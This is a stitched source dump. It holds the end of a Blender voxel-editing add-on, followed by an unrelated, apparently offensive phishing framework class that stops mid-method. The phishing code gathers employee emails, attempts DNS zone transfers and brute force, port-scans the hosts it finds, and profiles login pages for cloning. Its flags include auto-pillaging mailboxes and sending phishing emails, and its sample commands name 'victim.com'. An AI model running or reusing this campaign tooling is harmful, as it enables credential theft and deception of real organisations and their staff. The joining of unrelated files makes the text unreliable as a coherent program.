it saves me work (in terms of saving the data to the blend file), but it is also
crap because performance is bad. There is a limit of around 2000 voxels. Because
I've designed this program to be fairly modular, it shouldn't be too much work
in the future to replace this with an ID property system, which could possibly
be cached, but then the problem is displaying the voxels. Drawing in opengl is
quite a bit of extra work, and doesn't integrate as nicely. Doing stuff in edit
mode in a single object would be faster, but is more likely to result in user error
by editing the shape of the voxel array."""
#Operator Poll Functions
@classmethod
def poll_voxelarray_empty(cls, obj):
return obj is not None and obj.type == 'EMPTY'
@classmethod
def poll_voxelarray_empty_created(cls, obj):
if(cls.poll_voxelarray_empty(obj)):
if(obj.vox_empty.created):
return True
return False
@classmethod
def poll_can_boolean(cls, obj):
"""Method to check whether object is valid for a boolean intersection
between itself and a voxel array"""
if(obj.type != 'MESH'):
return False
if(Voxel.poll_voxel_mesh(obj)):
return False
return True
#yield functions
@classmethod
def voxelarrays_scene(cls, context):
for obj in context.scene.objects:
if cls.poll_voxelarray_empty(obj):
yield VoxelArray(obj, context)
#class property accessors
@classmethod
def get_selected(cls, context):
for va in cls.voxelarrays_scene(context):
if va.is_selected():
return va
return None
@classmethod
def clear_selected(cls, context):
for va in cls.voxelarrays_scene(context):
va.deselect()
def __init__(self, obj, context):
"""obj is the object in the context of the caller/creator"""
self.obj = obj
self.context = context
self.props = self.obj.vox_empty
def get_n_voxels(self):
return len(self)
def is_selected(self):
return self.obj.vox_empty.selected
def is_created(self):
return self.obj.vox_empty.created
def is_intersected(self):
return self.obj.vox_empty.intersected
def select_children(self):
for voxel in self.voxels():
voxel.select()
voxel.select_children()
def select_children_isect(self):
i = 0
for voxel in self.voxels():
voxel.select_children()
if i:
#set the first isect mesh as the active object
for isect_obj in voxel.obj.children:
set_active(self.context, isect_obj)
i+=1
def select(self):
self.clear_selected(self.context)
self.obj.vox_empty.selected = True
def deselect(self):
self.obj.vox_empty.selected = False
def apply_draw_type(self):
for voxel in self.voxels():
voxel.set_draw_type(self.draw_type())
def draw_type(self):
return self.obj.vox_empty.voxel_draw_type
def global_to_local(self, pos):
"""Convert global position to local position"""
matrix = self.obj.matrix_world.inverted()
return matrix * pos
def local_to_global(self, pos):
return self.obj.matrix_world * pos
def new_vox(self, pos):
#TODO: need to add check for replacing existing voxel
#pos_local = self.obj.matrix_world * pos
bpy.ops.mesh.primitive_cube_add()
vox = Voxel(get_active(self.context), self.context, creating=True)
vox.obj.location = pos
#vox.obj.scale = self.obj.scale
#svox.obj.rotation_euler = self.obj.rotation_euler
#print("active", get_active(self.context).name)
#print("self.obj", self.obj.name)
#print("vox.obj", vox.obj.name)
vox.obj.parent = self.obj
vox.gen_set_name(pos)
vox.set_draw_type(self.draw_type())
return vox
def del_vox_pos(self, pos):
#TODO: delete or rethink this function and if it's needed
vox = self.get_vox(pos)
if vox is not None:
override = {'selected_bases':[vox.obj]}
bpy.ops.delete(override)
return True
else:
return False
def voxels(self):
for c in self.obj.children:
yield Voxel(c, self.context)
def get_vox_pos(self, pos):
key_str = Voxel.gen_get_name(pos)
for c in self.obj.children:
if(c.name == key_str):
return Voxel(c, self.context)
return None
def intersect_ray(self, ray_origin, ray_target):
"""return list of voxel ray intersection instances
[VoxelRayIntersection, ...]"""
isects = []
for voxel in self.voxels():
isect = voxel.ray_cast(ray_origin, ray_target)
if isect is not None:
isects.append(isect)
if len(isects) == 0:
return None
else:
return isects
def get_intersect_obj(self):
isect_obj_name = self.obj.vox_empty.intersect_obj
if(isect_obj_name == ""):
return None
if isect_obj_name not in self.context.scene.objects:
return None
isect_obj = self.context.scene.objects[isect_obj_name]
return isect_obj
def intersect_mesh(self, obj, progress_callback):
n_voxels = len(self)
i = 0
for voxel in self.voxels():
isect_mesh = voxel.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
voxel.intersect_mesh(obj)
print("Intersecting: {0}/{1}".format(i, n_voxels))
i += 1
progress_callback(int((float(i)/float(n_voxels))*100.0))
self.obj.vox_empty.intersected = True
def delete_intersection(self, obj):
for voxel in self.voxels():
isect_mesh = voxel.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
self.obj.vox_empty.intersected = False
def __getitem__(self, index):
"""overload the "for in" method"""
return self.obj.children.__getitem__(index)
def get_name(self):
return self.obj.name
def __str__(self):
return str(self.obj)
def __len__(self):
return len(self.obj.children)
def voxelarray_apply_draw_type(drawtype_prop, context):
obj = context.object
va = VoxelArray(obj, context)
va.apply_draw_type()
class VoxelEmpty_props(bpy.types.PropertyGroup):
"""This class stores all the overall properties for the voxel array"""
intersect_obj = StringProperty(name="Intersect Obj",
description="Object to conduct intersection with voxels")
created = BoolProperty(
name="VoxelArray Created",
description="Voxel array has been created",
default=False)
selected = BoolProperty(
name="VoxelArray Selected",
description="Voxel array has been selected for editing",
default=False)
intersected = BoolProperty(
name="VoxelArray Intersected",
description="Voxel array has been intersected with object",
default=False)
voxel_draw_type = EnumProperty(
items=[
('TEXTURED','TEXTURED', 'voxels drawn with textures'),
('SOLID','SOLID', 'voxels drawn as solid'),
('WIRE','WIRE', 'voxels drawn as wireframe')],
name="Draw Type",
description="Draw type of the voxels in this VoxelArray",
update=voxelarray_apply_draw_type,
default='TEXTURED')
class VoxelEmpty_obj_prop(bpy.types.Panel):
"""This class is the panel that goes with the empty representing, and storing
all the data for the voxel array"""
bl_label = "Voxel Array"
bl_idname = "OBJECT_PT_voxelempty"
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.object)
def draw_header(self, context):
obj = context.object
if not obj.vox_empty.created:
self.layout.operator("object.voxelarray_create_voxels", text="Create")
def draw(self, context):
layout = self.layout
obj = context.object
va = VoxelArray(obj, context)
layout.active = va.is_created()
if(not va.is_selected()):
layout.operator("object.voxelarray_set_active", text="Set Active")
row = layout.row()
row.label(text="Active object is: " + obj.name)
row = layout.row()
row.prop(obj, "name")
if va.is_created():
row = layout.row()
nvoxels = len(va)
row.label(text="Voxels:{0}".format(nvoxels))
row = layout.row()
row.operator('object.voxelarray_select_children', text="Select Children")
row.operator('object.voxelarray_select_children_isect', text="Select Intersection")
row = layout.row()
p = context.object.vox_empty
row.prop(p, "voxel_draw_type")
# -- VoxelArray -> Mesh intersection ---
#set to only display intersect value when the selected
#object is valid for intersecting
#TODO: change this to use a custom property collection for searching
#and selection of the object.
row = layout.row()
isect_label_text = ""
if va.is_intersected():
isect_label_text = "Re-Intersect With Object:"
else:
isect_label_text = "Intersect With Object:"
#print(obj.vox_empty.intersect_obj)
#row.prop(data=obj.vox_empty, property="intersect_obj")
isect_obj = va.get_intersect_obj()
if(isect_obj is not None):
valid_isect_obj = VoxelArray.poll_can_boolean(isect_obj)
else:
valid_isect_obj = False
if(valid_isect_obj):
row.operator("object.voxelarray_intersect_mesh", text=isect_label_text)
else:
row.label(text=isect_label_text)
if va.is_intersected():
row.operator("object.voxelarray_delete_intersection", text="Delete Intersection")
row = layout.row()
row.prop_search(context.object.vox_empty, "intersect_obj",
context.scene, "objects", icon = 'OBJECT_DATA', text = "")
#row.prop_search(data=obj.vox_empty,
#property="intersect_obj",
#search_data=context.scene.objects,
#search_property="name")
class VoxelMesh_obj_prop(bpy.types.Panel):
"""This class is the panel that goes with objects which represent the individual
voxels in the voxel array. """
bl_label = "Voxel Properties"
bl_idname = "OBJECT_PT_voxelmesh"
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
#TODO check that parent EMPTY has voxel array initialised
obj = context.object
return Voxel.poll_voxel_mesh(obj)
def draw(self, context):
layout = self.layout
obj = context.object
row = layout.row()
row.label(text="Hello world!", icon='WORLD_DATA')
row = layout.row()
row.label(text="Active object is: " + obj.name)
row = layout.row()
row.prop(obj, "name")
class VoxelArraySetActiveOp(Operator):
bl_idname = "object.voxelarray_set_active"
bl_label = "Set the active VoxelArray"
bl_options = {'UNDO'}
def execute(self, context):
obj = context.object
va = VoxelArray(obj, context)
va.select()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArrayDeleteIntersectionOp(Operator):
bl_idname = "object.voxelarray_delete_intersection"
bl_label = "Delete VoxelArray Intersection"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context)
obj = context.object
va = VoxelArray(obj, context)
va.delete_intersection(obj)
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArraySelectChildren(Operator):
bl_idname = "object.voxelarray_select_children"
bl_label = "Select VoxelArray Children"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context, active_only=True) #only backup active selection
obj = context.object
va = VoxelArray(obj, context)
va.select_children()
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArraySelectChildrenIsect(Operator):
bl_idname = "object.voxelarray_select_children_isect"
bl_label = "Select VoxelArray Intersection"
bl_options = {'UNDO'}
def execute(self, context):
obj = context.object
va = VoxelArray(obj, context)
select_none(context)
va.select_children_isect()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArrayIntersectMeshOp(Operator):
"""Operator to intersect between mesh object and the voxel array"""
bl_idname = "object.voxelarray_intersect_mesh"
bl_label = "Intersect Voxels Mesh"
bl_options = {'UNDO'}
_timer = None
def execute(self, context):
wm = bpy.context.window_manager
wm.progress_begin(0, 100)
sb = SelectionBackup(context)
obj = context.object
va = VoxelArray(obj, context)
isect_obj = va.get_intersect_obj()
print("Intersecting:" + isect_obj.name)
va.intersect_mesh(isect_obj, self.progress_callback)
sb.restore()
wm.progress_end()
return {'FINISHED'}
def progress_callback(self, value):
bpy.context.window_manager.progress_update(value)
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty_created(context.object)
def cancel(self, context):
return {'CANCELLED'}
class VoxelArrayCreateVoxelsOp(Operator):
"""Operator to create and enable voxels on an empty"""
bl_idname = "object.voxelarray_create_voxels"
bl_label = "Create Voxels"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context, append=True)
obj = context.object
obj.vox_empty.created = True
va = VoxelArray(obj, context)
va.new_vox(Vector((0, 0, 2)))
va.select()
del va
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class EditVoxelsOperator(bpy.types.Operator):
"""Modal object selection with a ray cast
TODO: implement some options in the operator option panel, see if
it's possible to put buttons in there for utility things while
editing the voxels.
One thing I would also like to do is add some opengl visual feedback
when editing in this operator"""
bl_idname = "view3d.edit_voxels"
bl_label = "Voxel Editor"
def pick_voxel(self, context, event, voxelarray):
"""Run this function on left mouse, execute the ray cast
TODO: report/go through some problems with selecting in the
operator_modal_view3d_raycast.py. Most of the problem is
when trying to click close to the edge of the object.
The distance values are often mucked up"""
# get the context arguments
ray_max=10000.0
region = context.region
rv3d = context.region_data
coord = event.mouse_region_x, event.mouse_region_y
# get the ray from the viewport and mouse
view_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, coord)
ray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, coord)
ray_target = ray_origin + (view_vector * ray_max)
#TODO: raise some kind of error, or do a check/poll on this operator
#to ensure that there has been a voxel array created and selected
isects = voxelarray.intersect_ray(ray_origin, ray_target)
best_dist_squared = ray_max * ray_max
best_isect = None
if isects is None:
return None
for isect in isects:
dist_squared = isect.dist_squared
if(dist_squared < best_dist_squared):
best_dist_squared = dist_squared
best_isect = isect
return best_isect
def select_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
if(isect is None):
sb.restore()
return None
vox = isect.voxel
sb.restore()
vox.select()
return vox
def add_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
if(isect is None):
sb.restore()
return None
vox = isect.voxel
base_loc = vox.get_local_location()
new_loc = isect.nor * 2 + base_loc #add new voxel in direction normal
new_vox = va.new_vox(new_loc)
sb.restore()
#TODO: add a toggle for the select after placement
new_vox.select()
return new_vox
def delete_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
#select_none(context)
if(isect is not None):
vox = isect.voxel
vox.delete()
sb.restore()
return True
else:
sb.restore()
return False
def modal(self, context, event):
if event.type in {'MIDDLEMOUSE', 'WHEELUPMOUSE', 'WHEELDOWNMOUSE'}:
# allow navigation
return {'PASS_THROUGH'}
if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':
self.add_voxel(context, event)
return {'RUNNING_MODAL'}
if event.type == 'RIGHTMOUSE' and event.value == 'RELEASE':
#TODO: check return value, and cancel operator if
#nothing was deleted
retval = self.delete_voxel(context, event)
if(retval == False):
#TODO: add an option for this
return {'CANCELLED'}
if event.type in {'ESC'}:
return {'CANCELLED'}
return {'RUNNING_MODAL'}
def invoke(self, context, event):
if context.space_data.type == 'VIEW_3D':
context.window_manager.modal_handler_add(self)
return {'RUNNING_MODAL'}
else:
self.report({'WARNING'}, "Active space must be a View3d")
return {'CANCELLED'}
def register():
bpy.utils.register_module(__name__)
bpy.types.Object.vox_empty = PointerProperty(type=VoxelEmpty_props)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Object.vox_empty
if __name__ == "__main__":
register()
|
|
#import getopt
import argparse
import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from emails import EmailTemplate
from utils import Utils
from display import Display
from gather import Gather
from mydns import Dns
from webprofiler import profiler
from mydb import MyDB
from sitecloner import SiteCloner
from mailpillager import MailPillager
import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
def ctrlc(self):
print
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("stopping the webserver")
self.webserver.send_signal(signal.SIGINT)
# delete the pid file
os.remove(self.pid_path + "spfwebsrv.pid")
# as a double check, manually kill the process
self.killProcess(self.webserverpid)
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + "spfwebsrv.pid")):
os.remove(self.pid_path + "spfwebsrv.pid")
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", subprocess.check_output(cmd)))
#----------------------------
# Parse CommandLine Parms
#----------------------------
def parse_parameters(self, argv):
parser = argparse.ArgumentParser()
#==================================================
# Input Files
#==================================================
filesgroup = parser.add_argument_group('input files')
filesgroup.add_argument("-f",
metavar="<list.txt>",
dest="email_list_file",
action='store',
help="file containing list of email addresses")
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
#==================================================
# Enable Flags
#==================================================
enablegroup = parser.add_argument_group('enable flags')
enablegroup.add_argument("--all",
dest="enable_all",
action='store_true',
help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
enablegroup.add_argument("--test",
dest="enable_test",
action='store_true',
help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
enablegroup.add_argument("--recon",
dest="enable_recon",
action='store_true',
help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
enablegroup.add_argument("--external",
dest="enable_external",
action='store_true',
help="enable external tool utilization")
enablegroup.add_argument("--dns",
dest="enable_gather_dns",
action='store_true',
help="enable automated gathering of dns hosts")
enablegroup.add_argument("-g",
dest="enable_gather_email",
action='store_true',
help="enable automated gathering of email targets")
enablegroup.add_argument("-s",
dest="enable_send_email",
action='store_true',
help="enable automated sending of phishing emails to targets")
enablegroup.add_argument("--simulate",
dest="simulate_send_email",
action='store_true',
help="simulate the sending of phishing emails to targets")
enablegroup.add_argument("-w",
dest="enable_web",
action='store_true',
help="enable generation of phishing web sites")
enablegroup.add_argument("-W",
dest="daemon_web",
action='store_true',
help="leave web server running after termination of spf.py")
#==================================================
# Advanced Flags
#==================================================
advgroup = parser.add_argument_group('ADVANCED')
advgroup.add_argument("--adv",
dest="enable_advanced",
action='store_true',
help="perform all ADVANCED features same as (--dns --profile --pillage)")
advgroup.add_argument("--profile",
dest="profile_domain",
action='store_true',
help="profile the target domain (requires the --dns flag)")
advgroup.add_argument("--pillage",
dest="pillage_email",
action='store_true',
help="auto pillage email accounts (requires the --dns flag)")
#==================================================
# Optional Args
#==================================================
parser.add_argument("-d",
metavar="<domain>",
dest="domain",
action='store',
help="domain name to phish")
parser.add_argument("-p",
metavar="<domain>",
dest="phishdomain",
default="example.com",
action='store',
help="newly registered 'phish' domain name")
parser.add_argument("-c",
metavar="<company's name>",
dest="company",
action='store',
help="name of company to phish")
parser.add_argument("--ip",
metavar="<IP address>",
dest="ip",
#default=Utils.getIP(),
action='store',
help="IP of webserver defaults to [%s]" % (Utils.getIP()))
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
#==================================================
# Misc Flags
#==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("-y",
dest="always_yes",
action='store_true',
help="automatically answer yes to all questions")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["domain_name"] = args.domain
if (self.config["domain_name"] is None):
self.config["domain_name"] = ""
self.config["phishing_domain"] = args.phishdomain
if (self.config["phishing_domain"] is None):
self.config["phishing_domain"] = "example.com"
self.config["company_name"] = args.company
if (args.ip):
self.config["ip"] = args.ip
self.config["config_filename"] = args.config_file
self.config["email_list_filename"] = args.email_list_file
self.config["verbose"] = args.verbose
self.config["gather_emails"] = args.enable_gather_email
self.config["gather_dns"] = args.enable_gather_dns
self.config["profile_domain"] = args.profile_domain
self.config["pillage_email"] = args.pillage_email
self.config["enable_externals"] = args.enable_external
self.config["enable_web"] = args.enable_web
self.config["enable_email_sending"] = args.enable_send_email
self.config["simulate_email_sending"] = args.simulate_send_email
self.config["daemon_web"] = args.daemon_web
self.config["always_yes"] = args.always_yes
# process meta flags
# recon = gather emails and gather dns
if (args.enable_recon == True):
self.config["gather_emails"] = True
self.config["gather_dns"] = True
# all = gather emails, enable externals, etc...
if (args.enable_all == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["enable_web"] = True
self.config["enable_email_sending"] = True
self.config["verbose"] = 2
self.config["always_yes"] = True
# test = gather emails, enable externals, etc...
if (args.enable_test == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["simulate_email_sending"] = True
self.config["enable_web"] = True
self.config["always_yes"] = True
self.config["verbose"] = 2
# advanced = dns, profile, and pillage
if (args.enable_advanced == True):
self.config["gather_dns"] = True
self.config["profile_domain"] = True
self.config["pillage_email"] = True
# profile requires dns
if (self.config["profile_domain"] and not self.config["gather_dns"]):
self.config["profile_domain"] = False
self.display.error("--profile requires the --dns option to be enabled as well.")
# pillage requires dns
if (self.config["pillage_email"] and not self.config["gather_dns"]):
self.config["pillage_email"] = False
self.display.error("--pillage requires the --dns option to be enabled as well.")
# see if we are good to go
good = False
if (self.config["email_list_filename"]
or self.config["gather_emails"]
or self.config["enable_externals"]
or self.config["enable_web"]
or self.config["enable_email_sending"]
or self.config["simulate_email_sending"]
or self.config["gather_dns"]
or self.config["profile_domain"]
or self.config["pillage_email"]):
good = True
if (not good):
self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
print
parser.print_help()
sys.exit(1)
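    # Illustrative invocations (a sketch; the entry-point script name is assumed,
    # but the flags match those defined above):
    #   ./spf.py -d victim.com --test        # everything except real email sending
    #   ./spf.py -d victim.com -g --dns -y   # recon only: gather emails and DNS hosts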
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.is_readable("default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]")
print
temp1 = self.config
temp2 = Utils.load_config("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print
sys.exit(1)
# set verbosity/debug level
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] == None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
try:
temp_list = Dns.brute(self.config["domain_name"], display=self.display)
except:
pass
self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
self.display.verbose("Found POP at : %s 110" % (host))
self.server_list[110].append(host)
found = True
elif (port == 995):
self.display.verbose("Found POPS at : %s 995" % (host))
self.server_list[995].append(host)
found = True
elif (port == 143):
self.display.verbose("Found IMAP at : %s 143" % (host))
self.server_list[143].append(host)
found = True
elif (port == 993):
self.display.verbose("Found IMAPS at : %s 993" % (host))
self.server_list[993].append(host)
found = True
elif (port == 25):
self.display.verbose("Found SMTP at : %s 25" % (host))
self.server_list[25].append(host)
found = True
if (found):
self.display.log(host + "\n", filename="hosts.txt")
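    # Illustrative sketch of the structure built above (hypothetical hosts):
    #   self.server_list = {25: [], 80: ['www.victim.com'], 110: [], 143: [],
    #                       443: ['mail.victim.com'], 993: ['mail.victim.com'], 995: []}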
#----------------------------
# Profile Web Sites
#----------------------------
def profile_site(self):
# are required flags set?
if (self.config["profile_domain"] == True):
self.display.output("Determining if any of the identified hosts have web servers.")
# for hosts in the port 80 list
for host in self.server_list[80]:
# create a profiler object
p = profiler()
# run it against the website
profile_results = p.run("http://" + host, debug=False)
# if we got valid results, look to see if we have a match for one of the templates
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
# otherwise we will see about adding it to a list of sites to clone
if (p.hasLogin("http://" + host)):
self.profile_dynamic_web_templates.append("http://" + host)
# repeat same as for port 80
for host in self.server_list[443]:
p = profiler()
profile_results = p.run("https://" + host, debug=False)
if (profile_results and (len(profile_results) > 0)):
max_key = ""
max_value = 0
for key, value in profile_results:
if (value.getscore() > max_value):
max_key = key
max_value = value.getscore()
if (max_value > 0):
self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key))
self.profile_valid_web_templates.append(max_key)
else:
if (p.hasLogin("https://" + host)):
self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host))
self.profile_dynamic_web_templates.append("https://" + host)
# sort/unique list of valid templates
self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates)
self.profile_valid_web_templates.sort()
# print list of valid templates
self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates)))
self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates)
# sort/unique list of dynamic templates
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
